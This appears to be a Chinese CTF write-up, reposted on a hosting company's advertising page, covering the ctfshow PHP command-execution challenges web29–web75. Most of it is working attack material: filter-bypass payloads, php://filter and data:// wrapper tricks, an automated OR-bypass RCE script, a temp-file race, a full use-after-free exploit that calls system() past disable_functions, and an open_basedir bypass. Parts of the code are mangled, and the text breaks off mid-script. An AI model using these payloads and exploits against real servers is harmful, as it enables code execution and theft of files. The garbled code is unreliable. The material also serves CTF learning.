重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
这期内容当中小编将会给大家带来有关php中如何进行ctfshow命令执行,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
成都服务器托管,创新互联建站提供包括服务器租用、服务器机柜租用、带宽租用、云主机、机柜租用、主机租用托管、CDN网站加速、域名申请等业务的一体化完整服务。电话咨询:18980820575
命令执行,需要严格的过滤
源码:
preg_match — 执行匹配正则表达式
题目限制了不能出现flag
.
构造?c=system(ls);
页面回显:
flag.php index.php
绕过 flag ,通配符绕过。
linux 中有一些通配符。
*
代表任意字符 0个或多个
?
代表任意字符 1 个
[abcd]
匹配abcd中一个字符
[a-z]
匹配范围 a-z
还可以这样绕过
fla\g.php fla''g.php
payload :
?c=system('cat *'); ?c=system('cat fl?g.php'); ?c=system('cat f[a-z]ag.php');
执行 payload 后源代码中有显示。
另一种解法:
eval — 把字符串作为PHP代码执行
传入?c=echo "hello";?>看到有flag.php ,利用文件包含。
构造:
?c=echo "hello";?>得到一串base64 字符串,解码得到
web30~增加命令执行函数
命令执行,需要严格的过滤代码:
在上一题的基础上增加了过滤。
flag
、system
、php
但是我们依然可以用到其他函数进行代替。
system() passthru() # passthru — 执行外部程序并且显示原始输出 exec() # exec — 执行一个外部程序 shell_exec() # shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 popen() proc_open() pcntl_exec() 反引号 同shell_exec()这里需要注意一下,只有system函数是有回显的,其他的函数可以通过echo等显示
?c=echo passthru("cat f*"); ?c=echo `cat f*`;或者
?c=echo "hello"; include($_GET['url']); ?>&url=php://filter/read=convert.base64-encode/resource=flag.php题目wp:
echo `nl fl''ag.p''hp`;web31~过滤cat,空格
命令执行,需要严格的过滤源码:
1. cat被过滤
more:一页一页的显示档案内容 less:与 more 类似 head:查看头几行 tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示 tail:查看尾几行 nl:显示的时候,顺便输出行号 od:以二进制的方式读取档案内容 vi:一种编辑器,这个也可以查看 vim:一种编辑器,这个也可以查看 sort:可以查看 uniq:可以查看 file -f:报错出具体内容 grep 在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file paste 指令会把每个文件以列对列的方式,一列列地加以合并。2. 空格被过滤·
{$IFS} $IFS$9 > < <> 重定向符 %09(需要php环境) {cat,flag.php} //用逗号实现了空格功能 %20 https://blog.csdn.net/whuslei/article/details/7187639payload:
?c=echo(`tac%09f*`);解法二:
?c=include($_GET["url"]);?>&url=php://filter/read=convert.base64-encode/resource=flag.php官方
show_source(next(array_reverse(scandir(pos(localeconv())))));web32~文件包含绕过
又增加过滤了 反引号、括号,echo。
文件包含绕过
include require include_once require_oncepayload:
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.phpweb33~文件包含绕过
源码:
多过滤了一个双引号,
直接用上一题的 payload:
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.phpweb34~文件包含绕过
源码:
过滤多了一个冒号,也是上一关payload 。
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.phpweb35~文件包含绕过
多过滤了
<
、=
。没啥用,直接打?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php ?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.phpweb36~文件包含绕过
多过滤了
数字
,继续打。?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.phpweb37~data协议
过滤了flag ,又是 include 文件包含
利用伪协议读flag
data://,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行payload:
/?c=data://text/plain,web38~data协议
同样使用data协议。
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs=web39~data协议
payload:
?c=data://text/plain,data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用
web40~无参数读文件
|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }过滤了引号、$、冒号,还不能用伪协议。
一般括号里参数都要用引号,这里学习一下无参数RCE(remote command/code execute)。
无参数的意思可以是a()、a(b())或a(b(c())),但不能是a('b')或a('b','c'),不能带参数。
详情看这里:
payload:
c=readfile(next(array_reverse(scandir(getcwd())))); # 多刷新几次 c=readfile(array_rand(array_flip(scandir(getcwd())))); readfile(array_rand(array_flip(scandir(current(localeconve()))))); wp: c=session_start();system(session_id()); passid=lsweb41~异或绕过
这个题过滤了
$、+、-、^、~
使得异或自增和取反构造字符都无法使用,同时过滤了字母和数字。但是特意留了个或运算符|
。我们可以尝试从ascii为0-255的字符中,找到或运算能得到我们可用的字符的字符。这里先给出两个脚本 exp.py rce_or.php,大家以后碰到可以使用或运算绕过的可以自己手动修改下即可。生成可用字符的集-合
=32&ord($c)<=126) { $contents=$contents.$c." ".$a." ".$b."\n"; } } } } fwrite($myfile,$contents); fclose($myfile);大体意思就是
从进行异或的字符中排除掉被过滤的,然后在判断异或得到的字符是否为可见字符
传递参数getflag用法python exp.py
# -*- coding: utf-8 -*- import requests import urllib from sys import * import os os.system("php rce_or.php") #没有将php写入环境变量需手动运行 if(len(argv)!=2): print("="*50) print('USER:python exp.py') print("eg: python exp.py http://ctf.show/") print("="*50) exit(0) url=argv[1] def action(arg): s1="" s2="" for i in arg: f=open("rce_or.txt","r") while True: t=f.readline() if t=="": break if t[0]==i: #print(i) s1+=t[2:5] s2+=t[6:9] break f.close() output="(\""+s1+"\"|\""+s2+"\")" return(output) while True: param=action(input("\n[+] your function:") )+action(input("[+] your command:")) data={ 'c':urllib.parse.unquote(param) } r=requests.post(url,data=data) print("\n[*] result:\n"+r.text) https://blog.csdn.net/miuzzx/article/details/108569080
web42~
/dev/null 2>&1"); }else{ highlight_file(__FILE__); }payload:
c=ls; c=cat flag.php;web43~
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }过滤分号和
cat
使用 换行符%0a
?c=ls%0a ?c=tac flag.php%0a说一下为啥
system()
函数要用的分号或者截断,因为不用的话输入的语句就和后边的>/dev/null 2>&1
拼接起来了。最后不关输入啥都会把结果输出到/dev/null
。详情看这里: https://www.cnblogs.com/520playboy/p/6275022.html
web44~>/dev/null过滤; cat flag
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }过滤
;
、cat
、flag
结合前面的,直接:
?c=tac f*%0aweb45~>/dev/null多过滤空格
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }多过滤了个空格。
payload:
?c=tac%09f*%0a ?c=tac$IFS\f*%0A # 这里 f 前面不加 反斜杠的话就出不来,可能是会被前面的解析到一起吧。 ?c=more${IFS}f*%0aIFS: https://www.xuebuyuan.com/3197835.html
web46~多过滤数字 $ *
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }多过滤了数字、$ 、*
意味着不能用shell中变量了。
payload:
?c=tac%09fla?.php%0a nlweb47~多过滤读取函数
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }多过滤了 more 、less 、 head 、sort 、tail 。
但是 tac 、od 、uniq 等没被过滤
od 读文件 https://www.cnblogs.com/wfwenchao/p/5188720.html
payload:
?c=tac%09fla?.php%0a ?c=nl%09fla?.php%0a ?c=nlweb48~多过滤函数
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }多过滤了一些读取函数。
payload:
?c=tac%09fla?.php%0a ?c=tacweb49~多过滤反引号
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }多过滤反引号。
payload 同上关一样。
web50~多过滤% x09 x26
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }多过滤
%
、09
、26
?c=tacfla\g.php%0a web51~多过滤tac
/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }这回额外过滤了
tac
,但是我们还可以用nl
?c=nlweb52~多过滤重定向符但没过滤 $
|\/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }额外过滤了 重定向符
< >
,但是这里没过滤$
去查
?c=nl${IFS}fla\g.php%0a
得到$flag="flag_here";
得到了一个假的flag.查询根目录有啥文件
?c=ls${IFS}/%0a # bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var ?c=nl${IFS}/fla''g%0aweb53
|\".$d; }else{ echo 'no'; } }else{ highlight_file(__FILE__); }也没多过滤啥。。
?c=ls%0a
得到ls flag.php index.php readflag readflagpayload:
?c=ls%0a ?c=nlweb54~/bin/?at 绕过
|\多过滤了一些查看文件指令。
payload:
?c=paste${IFS}fla?.php%0a ?c=/bin/?at${IFS}f?ag.php%0a ?c=/bin/?at${IFS}f???????web55~过滤所有小写字母
|\直接过滤了所有小写字母!!!。
那么这里肯定是要无字符 rce 。
但是这里没有过滤通配符,所以可以找到一个带有数字的命令,利用通配符执行命令。
base64的使用
有个命令是
/bin/base64
,我们可以据此构造?c=/???/????64 ????????得到
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMg QERhdGU6ICAgMjAyMC0wOS0wNyAxOTo0MDo1Mw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhh DQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDcgMTk6NDE6MDANCiMgQGVtYWlsOiBo MXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxh Zz0iZmxhZ3tlYTY0MTJlZi03NGY3LTQ1ZjItYWJiYS05M2Y2ODZkOTkwZDh9Ijs=解码即得到flag.
bzip2
bzip2 是 linux 下面的压缩文件的命令。在
/usr/bin/bzip2
构造
?C=/???/???/????2 ????????然后访问
flag.php.bz2
下载即可获得 flag.php临时文件上传
https://www.gem-love.com/websecurity/1407.html
https://blog.csdn.net/qq_46091464/article/details/108557067
web56~临时文件
|\多过滤数字,所以用不了上题的前两种方法。这里只能详细写一下上题的第三种方法了。
我们可以通过post一个文件(文件里面的sh命令),在上传的过程中,通过
.(点)
去执行执行这个文件。(形成了条件竞争)。一般来说这个文件在linux下面保存在/tmp/php??????
一般后面的6个字符是随机生成的有大小写。(可以通过linux的匹配符去匹配)注意:通过
.去执行sh命令不需要有执行权限
我们需要构造一个post上传文件的数据包。
POST数据包POC 抓包,构造
?c=.+/???/????????[@-[]
web57~构造数字
|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){ system("cat ".$c.".php"); } }else{ highlight_file(__FILE__); }这里只需要构造 传参 36 即可,但是数字字符都被ban了。
paylaod
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~ $(())))$((~$(())))$((~$(())))))))linux echo 一下是 36.
web58~readfile读取
post构造
c=system('ls');
结果Warning: system() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1system 函数被 ban了
Warning: shell_exec() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1构造
c=print_r(scandir('.'));
.得到Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )payload:
c=readfile('flag.php');web59~show_source读取
同上关但是,
Warning: readfile() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1尝试其他读取文件函数
c=show_source('flag.php');web60-65~show_source读取
payload:
同58一样web66~highlight_file读取
用以前方法
Warning: show_source() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1
c=highlight_file('flag.php');
结果$flag="秀秀得了,这次不在这里";
c=print_r(scandir('/'));
返回Array ( [0] => . [1] => .. [2] => .dockerenv [3] => bin [4] => dev [5] => etc [6] => flag.txt [7] => home [8] => lib [9] => media [10] => mnt [11] => opt [12] => proc [13] => root [14] => run [15] => sbin [16] => srv [17] => sys [18] => tmp [19] => usr [20] => var )有个flag.txt ,构造 payload:
c=highlight_file('/flag.txt');web67~var_dump打印
找目录,发现
Warning: print_r() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1用
c=var_dump(scandir('.'));
array(4) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(8) "flag.php" [3]=> string(9) "index.php" }
c=highlight_file('flag.php');
又是假的。最终
c=highlight_file('/flag.txt');web68~include读取
打开题目直接
Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19说明
highlight_file
函数被禁用了。
c=var_dump(scandir('/'));
得到array(21) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(3) "dev" [5]=> string(3) "etc" [6]=> string(8) "flag.txt" [7]=> string(4) "home" [8]=> string(3) "lib" [9]=> string(5) "media" [10]=> string(3) "mnt" [11]=> string(3) "opt" [12]=> string(4) "proc" [13]=> string(4) "root" [14]=> string(3) "run" [15]=> string(4) "sbin" [16]=> string(3) "srv" [17]=> string(3) "sys" [18]=> string(3) "tmp" [19]=> string(3) "usr" [20]=> string(3) "var" }有个
flag.txt
readfile
、show_source
、highlight_file
被禁用了.读取不了,但是我们还可以直接文件包含。
payload:
c=include('/flag.txt');web69~var_export打印
同样是
Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19var_dump 也被禁用
Warning: var_dump() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1
var_export — 输出或返回一个变量的字符串表示
用
c=var_export(scandir('/'));
得到array ( 0 => '.', 1 => '..', 2 => '.dockerenv', 3 => 'bin', 4 => 'dev', 5 => 'etc', 6 => 'flag.txt', 7 => 'home', 8 => 'lib', 9 => 'media', 10 => 'mnt', 11 => 'opt', 12 => 'proc', 13 => 'root', 14 => 'run', 15 => 'sbin', 16 => 'srv', 17 => 'sys', 18 => 'tmp', 19 => 'usr', 20 => 'var', )payload:
c=var_export(scandir('/'));` c=include('/flag.txt');web70~var_export+include
直接:
Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 21 你要上天吗?payload:
c=var_export(scandir('/')); c=include('/flag.txt');web71~exit(0); 绕过后边代码
Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 24 你要上天吗?
c=var_export(scandir('/'));
得到???????: ?????_?????????() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ???????: ???_???() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ????? ( ? => '.', ? => '..', ? => '.?????????', ? => '???', ? => '???', ? => '???', ? => '????.???', ? => '????', ? => '???', ? => '?????', ?? => '???', ?? => '???', ?? => '????', ?? => '????', ?? => '???', ?? => '????', ?? => '???', ?? => '???', ?? => '???', ?? => '???', ?? => '???', ) 你要上天吗?......发现有个附件,下载打开:
你要上天吗?代码把输出的字母数字都转换为问号
?
.我们可以是服务端执行完我们的恶意 payload 后就停止运行 php 程序。
所以可以
c=var_export(scandir('/'));exit(0);
使得后边的代码停止执行,从而不会被正则替换。payload:
c=var_export(scandir('/'));exit(0); c=include('/flag.txt');exit(0);web72~open_basedir
下载附件:
你要上天吗?执行
c=include('flag.php');exit(0);
没内容打印。有进行读取根目录文件,但是被 open_basedir限制.
进行绕过。
c=$it=newDirectoryIterator("glob:///*");foreach($itas$f) {echo$f->getFilename()."\n";}die();得到根目录文件
bin dev etc flag0.txt home lib media mnt opt proc root run sbin srv sys tmp usr var有
flag0.txt
.Warning: include(): Failed opening '/flag0.txt' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php(19) : eval()'d code on line 1exp:
a); $backtrace = (new Exception)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= sprintf("%c",($ptr & 0xff)); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = sprintf("%c",($v & 0xff)); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function my_str_repeat($a,$b){ $s = ''; for($i = 0; $i <= $b;$i++){ $s.=$a; } return $s; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg = str_shuffle(my_str_repeat('A', 79)); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle(my_str_repeat('A', 79)); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); } exit();https://www.m00nback.xyz/2020/02/17/ctfshow%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AEwriteup/
https://www.jb51.net/article/141767.htm
但是我打不出来。。。。。
web73
Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 24 你要上天吗?
c=var_export(scandir('/'));die();
得到array ( 0 => '.', 1 => '..', 2 => '.dockerenv', 3 => 'bin', 4 => 'dev', 5 => 'etc', 6 => 'flagc.txt', 7 => 'home', 8 => 'lib', 9 => 'media', 10 => 'mnt', 11 => 'opt', 12 => 'proc', 13 => 'root', 14 => 'run', 15 => 'sbin', 16 => 'srv', 17 => 'sys', 18 => 'tmp', 19 => 'usr', 20 => 'var', )payload:
c=include('/flagc.txt');die();web74~glob协议
c=var_export(scandir('/'));die();
结果输出NULL
.glob 协议读取:
c=$it=newDirectoryIterator("glob:///*");foreach($itas$f) {echo$f->getFilename()."\n";}die();得到flag:
c=include('/flagx.txt');die();web75~不太行
glob://
协议读文件名flag36.txt
,c=$it = new DirectoryIterator("glob:///*");foreach($it as $f) {echo$f->getFilename()."\n";}die();接下来就是懵逼时刻了。
p牛的bypass open_basedir脚本:
0; $i--) { chdir('..'); } $paths = explode('/', $relat_file); $j = 0; for ($i = 0; $paths[$i] == '..'; $i++) { mkdir($name); chdir($name); $j++; } for ($i = 0; $i <= $j; $i++) { chdir('..'); } $tmp = array_fill(0, $j + 1, $name); symlink(implode('/', $tmp), 'tmplink'); $tmp = array_fill(0, $j, '..'); symlink('tmplink/' . implode('/', $tmp) . $file, $exp); unlink('tmplink'); mkdir('tmplink'); delfile($name); $exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}"; $exp = "http://{$_SERVER['SERVER_NAME']}{$exp}"; echo "\n-----------------content---------------\n\n"; echo file_get_contents($exp); delfile('tmplink'); function getRelativePath($from, $to) { // some compatibility fixes for Windows paths $from = rtrim($from, '\/') . '/'; $from = str_replace('\\', '/', $from); $to = str_replace('\\', '/', $to); $from = explode('/', $from); $to = explode('/', $to); $relPath = $to; foreach($from as $depth => $dir) { // find first non-matching dir if($dir === $to[$depth]) { // ignore this directory array_shift($relPath); } else { // get 
当前名称:php中如何进行ctfshow命令执行
标题路径:http://cqcxhl.com/article/ppehcj.html